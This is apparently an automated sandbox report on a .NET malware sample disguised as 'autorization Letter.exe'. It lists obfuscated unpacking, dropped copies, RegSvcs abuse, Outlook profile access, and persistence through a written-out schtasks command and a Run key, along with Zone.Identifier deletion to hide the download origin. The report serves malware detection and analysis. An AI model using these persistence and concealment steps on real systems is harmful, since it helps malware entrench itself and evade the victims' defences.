                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: mscoree.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: version.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeSection loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\autorization Letter.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\autorization Letter.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\ProfilesJump to behavior
                      Source: autorization Letter.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: autorization Letter.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                      Source: autorization Letter.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                      Source: Binary string: PkJS.pdb source: autorization Letter.exe, tIFjYTCo.exe.1.dr
                      Source: Binary string: PkJS.pdbSHA256a source: autorization Letter.exe, tIFjYTCo.exe.1.dr
                      Source: Binary string: RegSvcs.pdb, source: GUIVTme.exe, 00000010.00000000.2249012079.0000000000902000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr
                      Source: Binary string: RegSvcs.pdb source: GUIVTme.exe, 00000010.00000000.2249012079.0000000000902000.00000002.00000001.01000000.0000000D.sdmp, GUIVTme.exe.9.dr

                      Data Obfuscation

                      barindex
                      .NET source code contains potential unpacker
                      Source: autorization Letter.exe, Form1.cs.Net Code: InitializeComponent
                      Source: tIFjYTCo.exe.1.dr, Form1.cs.Net Code: InitializeComponent
                      Source: 1.2.autorization Letter.exe.5a60000.4.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.cs.Net Code: FN6kAlCTUA System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.autorization Letter.exe.34598c4.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.cs.Net Code: FN6kAlCTUA System.Reflection.Assembly.Load(byte[])
                      Source: 10.2.tIFjYTCo.exe.27098b4.0.raw.unpack, QBy45BY4uMbUQs88Qq.cs.Net Code: KmDc5Q9bs System.Reflection.Assembly.Load(byte[])
                      Source: autorization Letter.exeStatic PE information: 0x8BCF3D3C [Sat Apr 30 07:37:32 2044 UTC]
                      Source: C:\Users\user\Desktop\autorization Letter.exeCode function: 1_2_016BEE10 pushfd ; iretd 1_2_016BEE11
                      Source: C:\Users\user\Desktop\autorization Letter.exeCode function: 1_2_058AC590 push eax; ret 1_2_058AC5A3
                      Source: C:\Users\user\Desktop\autorization Letter.exeCode function: 1_2_058AC549 push eax; ret 1_2_058AC5A3
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_00D0EE10 pushfd ; iretd 10_2_00D0EE11
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_04CEC549 push eax; ret 10_2_04CEC5A3
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_04CEC57F push eax; ret 10_2_04CEC5A3
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_04CE6600 pushad ; iretd 10_2_04CE660A
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_04CE77E1 push edi; iretd 10_2_04CE77EE
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_04CEC218 pushfd ; iretd 10_2_04CEC225
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_04CEB349 pushad ; iretd 10_2_04CEB355
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_04CE18C0 push es; iretd 10_2_04CE18CA
                      Source: C:\Users\user\AppData\Roaming\tIFjYTCo.exeCode function: 10_2_04CE8925 pushad ; iretd 10_2_04CE892E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 14_2_05E9A349 push 8B038899h; iretd 14_2_05E9A34E
                      Source: autorization Letter.exeStatic PE information: section name: .text entropy: 7.850552008247241
                      Source: tIFjYTCo.exe.1.drStatic PE information: section name: .text entropy: 7.850552008247241
                      Source: 1.2.autorization Letter.exe.5a60000.4.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                      Source: 1.2.autorization Letter.exe.5a60000.4.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, yxVmJLNMxItFD4gtlw.csHigh entropy of concatenated method names: 'LJggpU5HQm', 'G0igWpPIdo', 'fT4g6lCPHe', 'FhegRtDhGW', 'JjMg5nycZT', 'NtNgtXnF6s', 'qVugnLKtVv', 'U8CgErDyj8', 'bsqgiXf53X', 'PKegHqfQOH'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, Eqhytk7pjoST4sg0KT.csHigh entropy of concatenated method names: 'dw4baUeBSV', 'cdWbS7FcUb', 'OsIbkJwNOW', 'dSrbTJfcN0', 'XZ5b8FoXu6', 'bHSb23hhRF', 'FldbULRDY0', 'RxgjmXvJhN', 'pP8jrbBxDW', 'ILJjxZFoOf'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, YpTWJpZyAmNmFD026j.csHigh entropy of concatenated method names: 'C3VaZ4pBUS', 'dGgaMMjZy9', 'k5HaLIu74j', 'TugaB9TBP6', 'JU2ag5BGI8', 'TCRaFZtKKG', 'M55VlCUlsEkAvTCDN2', 'vRR09m5KbNajnMMu7M', 'JUBaa5srRO', 'OvsaSso6Hd'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, Ew9Mhe1NCjRAdHx3lS.csHigh entropy of concatenated method names: 'ToString', 'rcAFGBPVa2', 'RBFF5dZJxy', 'XHHFtG5hQU', 'rrmFnbcnjy', 'wvVFEv8wsX', 'JsQFicDayf', 'OKpFHuRXsb', 'vsEFhbW3ox', 'kJ8F3MUUMP'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, iPyZ94TiRa2ebZuHpM.csHigh entropy of concatenated method names: 'kiFZPRI11W', 'ICjZys9s0B', 'AhbZABqTRw', 'bmjZw6IYYQ', 'iq4ZVTwxQa', 'i5KZfJqFcI', 'qu8ZYAbQXD', 'lQIZOwPUtM', 'k96Z0kVbw5', 'DknZNKmMkm'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, md29wrV9kisHjHUXvF.csHigh entropy of concatenated method names: 'X45orGoWqu', 'BsWo1TWg9b', 'mG8j7cMn5r', 'NUajaNAsxq', 'YLooGKXZoR', 'Pn1oWngO8c', 'BNaoIBjKjA', 'vL3o6k42EV', 'o6qoRAA5FM', 'PJQoXO4TZx'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, poU46SQrMKhRY6KoAP.csHigh entropy of concatenated method names: 'bWCSJCf7q9', 'cv6ST6TB7b', 'S0rS8RjYrE', 'W2eSsD7Br1', 'LwvS2ykFr2', 'LifSUNu6is', 'RD9SZLx8Qm', 'kYvSMlmx4L', 'B7gSeaoive', 'IvUSLwsrH2'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, lSFA8pMlGZmCox3ZBB.csHigh entropy of concatenated method names: 'sXB86nBdnv', 'Xq38RWaapL', 'moR8X9FhJQ', 'zM48dEkVUe', 'PtC8qKnVDy', 'VUO84VlBkj', 'vIv8mwrgI0', 'xXa8rpPcLP', 'qrU8xfZSfU', 'GbV81IwvCi'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, tHDLKkJMT8oEx4RQ7t.csHigh entropy of concatenated method names: 'BHpKOTG7oe', 'DblK0bbnyg', 'YfrKvDoxFa', 'gQrK57AmGg', 'IqZKn7VOaW', 'SalKEYvX7q', 'pArKHFRrTx', 'nBLKhU4nBW', 'DNTKpqBI12', 'SyVKGeGAmK'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, fVF3XIqralY1JOMaqw.csHigh entropy of concatenated method names: 'G6hjT4dfqW', 'NTyj8NS2J7', 'mZsjsmuepN', 'U2Uj2xs0Yv', 'c0sjUi0jWn', 'SlWjZOUqxg', 'au0jMoRgTq', 'gvNjeLyhcQ', 'mRfjLX2VwG', 'GsZjBIqB7x'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, QW8J5PzYIbsH5vnDyy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FvIbKCkiGl', 'NRdbgnvS8w', 'LP5bFnGG8e', 'W6pbo3VYTJ', 'WB5bjCBjUY', 'k8dbbnX3ls', 'NbTb97t94C'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, o9jdmQsGCgTIkNmGv2.csHigh entropy of concatenated method names: 'RJZswhF3tk', 't1EsfDbyks', 'RJ2sOuDKuM', 'X1Hs0xoLwY', 'zBBsgfmg0r', 'sIKsFRdVFR', 'x4PsoYsd7D', 'WWwsjdra5v', 'mnHsbYUQGC', 'aAIs94BSCt'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, nFhELShYqYU65kYU5Q9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xpq96wgAFu', 'pbS9RaTesL', 'AQa9XfBmSa', 'Cer9d9cRdX', 'sKR9qF7YYu', 'wpc94k858D', 'Ea49mL0Wmq'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, rN9XSjdhqZcuDiacet.csHigh entropy of concatenated method names: 'Dispose', 'UsCaxPTXbZ', 'fCYl5jJTIL', 'rqtQQpOnsS', 'P0Ua1DNptF', 'vuDazw0Eik', 'ProcessDialogKey', 'wqHl78itUr', 'FEZlaiWrwq', 'DXpllTbkTF'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, tRcBh7FnfYqZ2Ih46n.csHigh entropy of concatenated method names: 'Fw5jvakq8g', 'HZPj5fBsGL', 'tkIjtanFBq', 'hnOjnb0NJw', 'o7kj6tao9C', 'X9ajEX1dI9', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, rT4Z1xKJgfbBPIZRpY.csHigh entropy of concatenated method names: 'hZiUJLy4UO', 'uHfU8DxdL4', 'LIlU2JGTjh', 'd6aUZcXLVp', 'HSwUM4jW6H', 'Qs12qH9rj3', 'qiH24EpDFh', 'S1X2mbddp4', 'gUa2reNCqk', 'N5J2xhwPGo'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, DKZiXxkL622DIf6Iun.csHigh entropy of concatenated method names: 'KmfoLqTUIU', 'FsDoB94veA', 'ToString', 'juooTOMx63', 'Xb6o8yuP6N', 'DXfosh6hgt', 'FSfo2tvxY0', 'EIdoUD7por', 'q11oZ6JP5t', 'GOloM9QKHi'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, ivja7VtTKYMOBOMtQ6.csHigh entropy of concatenated method names: 'nIsASRL9P', 'B19wsfoP5', 'c49f2A9ss', 'NYqYZyWqu', 'dHg0HuCX0', 'HsENeNDcF', 'QhhvibEWC9EDfRv9mE', 'IrDUQro4XMEhJOFwBO', 'GMfjv4baZ', 'Ywi9ihNKm'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, TX5JuTvpNMXGIiq0R2.csHigh entropy of concatenated method names: 'yZRZTPIWlS', 'rU5Zsx0r2G', 'eKHZUu5uF9', 'C3FU1BHIBR', 'AsiUzVaFqF', 'emEZ7iTRfc', 'clSZa0A5kD', 'dODZl4BZSN', 'ifnZSeIgnv', 'Ry8ZkF794r'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, mYX6GjheM6iRDrSYZic.csHigh entropy of concatenated method names: 'S39bPJ9ZaI', 'EFoby6boEh', 'l6qbAJQJJE', 'iE1bw7kTID', 'knJbVbSj6w', 'x5FbfiZj9j', 'nQBbY0O8sg', 'wqubO1RBRf', 'GjCb0GNE77', 'stfbNeSYNp'
                      Source: 1.2.autorization Letter.exe.7860000.5.raw.unpack, UY6OkZmTbEf4BsBGNk.csHigh entropy of concatenated method names: 'PrW2V2eKTV', 'yfZ2Yd4ILi', 'rZpstMqMXc', 'rTBsnO2QXT', 'jOlsEmjWSy', 'BEksi450wH', 's6DsHBOP4o', 'c9lshqbbI7', 'wDQs3Ripmw', 'P95spyyPIt'
                      Source: 1.2.autorization Letter.exe.34598c4.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                      Source: 1.2.autorization Letter.exe.34598c4.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, yxVmJLNMxItFD4gtlw.csHigh entropy of concatenated method names: 'LJggpU5HQm', 'G0igWpPIdo', 'fT4g6lCPHe', 'FhegRtDhGW', 'JjMg5nycZT', 'NtNgtXnF6s', 'qVugnLKtVv', 'U8CgErDyj8', 'bsqgiXf53X', 'PKegHqfQOH'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, Eqhytk7pjoST4sg0KT.csHigh entropy of concatenated method names: 'dw4baUeBSV', 'cdWbS7FcUb', 'OsIbkJwNOW', 'dSrbTJfcN0', 'XZ5b8FoXu6', 'bHSb23hhRF', 'FldbULRDY0', 'RxgjmXvJhN', 'pP8jrbBxDW', 'ILJjxZFoOf'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, YpTWJpZyAmNmFD026j.csHigh entropy of concatenated method names: 'C3VaZ4pBUS', 'dGgaMMjZy9', 'k5HaLIu74j', 'TugaB9TBP6', 'JU2ag5BGI8', 'TCRaFZtKKG', 'M55VlCUlsEkAvTCDN2', 'vRR09m5KbNajnMMu7M', 'JUBaa5srRO', 'OvsaSso6Hd'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, Ew9Mhe1NCjRAdHx3lS.csHigh entropy of concatenated method names: 'ToString', 'rcAFGBPVa2', 'RBFF5dZJxy', 'XHHFtG5hQU', 'rrmFnbcnjy', 'wvVFEv8wsX', 'JsQFicDayf', 'OKpFHuRXsb', 'vsEFhbW3ox', 'kJ8F3MUUMP'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, iPyZ94TiRa2ebZuHpM.csHigh entropy of concatenated method names: 'kiFZPRI11W', 'ICjZys9s0B', 'AhbZABqTRw', 'bmjZw6IYYQ', 'iq4ZVTwxQa', 'i5KZfJqFcI', 'qu8ZYAbQXD', 'lQIZOwPUtM', 'k96Z0kVbw5', 'DknZNKmMkm'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, md29wrV9kisHjHUXvF.csHigh entropy of concatenated method names: 'X45orGoWqu', 'BsWo1TWg9b', 'mG8j7cMn5r', 'NUajaNAsxq', 'YLooGKXZoR', 'Pn1oWngO8c', 'BNaoIBjKjA', 'vL3o6k42EV', 'o6qoRAA5FM', 'PJQoXO4TZx'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, poU46SQrMKhRY6KoAP.csHigh entropy of concatenated method names: 'bWCSJCf7q9', 'cv6ST6TB7b', 'S0rS8RjYrE', 'W2eSsD7Br1', 'LwvS2ykFr2', 'LifSUNu6is', 'RD9SZLx8Qm', 'kYvSMlmx4L', 'B7gSeaoive', 'IvUSLwsrH2'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, lSFA8pMlGZmCox3ZBB.csHigh entropy of concatenated method names: 'sXB86nBdnv', 'Xq38RWaapL', 'moR8X9FhJQ', 'zM48dEkVUe', 'PtC8qKnVDy', 'VUO84VlBkj', 'vIv8mwrgI0', 'xXa8rpPcLP', 'qrU8xfZSfU', 'GbV81IwvCi'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, tHDLKkJMT8oEx4RQ7t.csHigh entropy of concatenated method names: 'BHpKOTG7oe', 'DblK0bbnyg', 'YfrKvDoxFa', 'gQrK57AmGg', 'IqZKn7VOaW', 'SalKEYvX7q', 'pArKHFRrTx', 'nBLKhU4nBW', 'DNTKpqBI12', 'SyVKGeGAmK'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, fVF3XIqralY1JOMaqw.csHigh entropy of concatenated method names: 'G6hjT4dfqW', 'NTyj8NS2J7', 'mZsjsmuepN', 'U2Uj2xs0Yv', 'c0sjUi0jWn', 'SlWjZOUqxg', 'au0jMoRgTq', 'gvNjeLyhcQ', 'mRfjLX2VwG', 'GsZjBIqB7x'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, QW8J5PzYIbsH5vnDyy.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'FvIbKCkiGl', 'NRdbgnvS8w', 'LP5bFnGG8e', 'W6pbo3VYTJ', 'WB5bjCBjUY', 'k8dbbnX3ls', 'NbTb97t94C'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, o9jdmQsGCgTIkNmGv2.csHigh entropy of concatenated method names: 'RJZswhF3tk', 't1EsfDbyks', 'RJ2sOuDKuM', 'X1Hs0xoLwY', 'zBBsgfmg0r', 'sIKsFRdVFR', 'x4PsoYsd7D', 'WWwsjdra5v', 'mnHsbYUQGC', 'aAIs94BSCt'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, nFhELShYqYU65kYU5Q9.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'Xpq96wgAFu', 'pbS9RaTesL', 'AQa9XfBmSa', 'Cer9d9cRdX', 'sKR9qF7YYu', 'wpc94k858D', 'Ea49mL0Wmq'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, rN9XSjdhqZcuDiacet.csHigh entropy of concatenated method names: 'Dispose', 'UsCaxPTXbZ', 'fCYl5jJTIL', 'rqtQQpOnsS', 'P0Ua1DNptF', 'vuDazw0Eik', 'ProcessDialogKey', 'wqHl78itUr', 'FEZlaiWrwq', 'DXpllTbkTF'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, tRcBh7FnfYqZ2Ih46n.csHigh entropy of concatenated method names: 'Fw5jvakq8g', 'HZPj5fBsGL', 'tkIjtanFBq', 'hnOjnb0NJw', 'o7kj6tao9C', 'X9ajEX1dI9', 'Next', 'Next', 'Next', 'NextBytes'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, rT4Z1xKJgfbBPIZRpY.csHigh entropy of concatenated method names: 'hZiUJLy4UO', 'uHfU8DxdL4', 'LIlU2JGTjh', 'd6aUZcXLVp', 'HSwUM4jW6H', 'Qs12qH9rj3', 'qiH24EpDFh', 'S1X2mbddp4', 'gUa2reNCqk', 'N5J2xhwPGo'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, DKZiXxkL622DIf6Iun.csHigh entropy of concatenated method names: 'KmfoLqTUIU', 'FsDoB94veA', 'ToString', 'juooTOMx63', 'Xb6o8yuP6N', 'DXfosh6hgt', 'FSfo2tvxY0', 'EIdoUD7por', 'q11oZ6JP5t', 'GOloM9QKHi'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, ivja7VtTKYMOBOMtQ6.csHigh entropy of concatenated method names: 'nIsASRL9P', 'B19wsfoP5', 'c49f2A9ss', 'NYqYZyWqu', 'dHg0HuCX0', 'HsENeNDcF', 'QhhvibEWC9EDfRv9mE', 'IrDUQro4XMEhJOFwBO', 'GMfjv4baZ', 'Ywi9ihNKm'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, TX5JuTvpNMXGIiq0R2.csHigh entropy of concatenated method names: 'yZRZTPIWlS', 'rU5Zsx0r2G', 'eKHZUu5uF9', 'C3FU1BHIBR', 'AsiUzVaFqF', 'emEZ7iTRfc', 'clSZa0A5kD', 'dODZl4BZSN', 'ifnZSeIgnv', 'Ry8ZkF794r'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, mYX6GjheM6iRDrSYZic.csHigh entropy of concatenated method names: 'S39bPJ9ZaI', 'EFoby6boEh', 'l6qbAJQJJE', 'iE1bw7kTID', 'knJbVbSj6w', 'x5FbfiZj9j', 'nQBbY0O8sg', 'wqubO1RBRf', 'GjCb0GNE77', 'stfbNeSYNp'
                      Source: 1.2.autorization Letter.exe.46b0be0.3.raw.unpack, UY6OkZmTbEf4BsBGNk.csHigh entropy of concatenated method names: 'PrW2V2eKTV', 'yfZ2Yd4ILi', 'rZpstMqMXc', 'rTBsnO2QXT', 'jOlsEmjWSy', 'BEksi450wH', 's6DsHBOP4o', 'c9lshqbbI7', 'wDQs3Ripmw', 'P95spyyPIt'
                      Source: 10.2.tIFjYTCo.exe.27098b4.0.raw.unpack, kD0JNdgNBriBGn5egS.csHigh entropy of concatenated method names: 'ubU6vJppswKkZ', 'uvAmfDYbimWPg9rmyH6', 'XHYItoYHo1DoUvgeuNZ', 'tYVkNWYXlYIi7gDFfLn', 'TV4H82YzoL7kT86loIA', 'yoiEG7M3KqRFDlQAaqW', 'rU4RpWYS77WPQpUZwKR', 'vGvSIFYGEhSitdykOPg', 'TCSl6vMYjB5c5h75h4u'
                      Source: 10.2.tIFjYTCo.exe.27098b4.0.raw.unpack, QBy45BY4uMbUQs88Qq.csHigh entropy of concatenated method names: 'QByY45B4u', 'EbUNQs88Q', 'D8PguGCCm', 'gfwtorebq', 'rQ9oD0JNd', 'cBrXiBGn5', 'sgS08fT72', 'lmAQKmrG6', 'qn1mTNvNO', 'K084ZL4CG'
                      Source: C:\Users\user\Desktop\autorization Letter.exeFile created: C:\Users\user\AppData\Roaming\tIFjYTCo.exeJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exeJump to dropped file

                      Boot Survival

                      barindex
                      Uses schtasks.exe or at.exe to add and modify task schedules
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\tIFjYTCo" /XML "C:\Users\user\AppData\Local\Temp\tmpF639.tmp"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeRegistry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run GUIVTmeJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      barindex
                      Hides that the sample has been downloaded from the Internet (zone.identifier)
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Roaming\GUIVTme\GUIVTme.exe:Zone.Identifier read attributes | delete
                      Loading BitLocker PowerShell Module
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Users\user\Desktop\autorization Letter.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
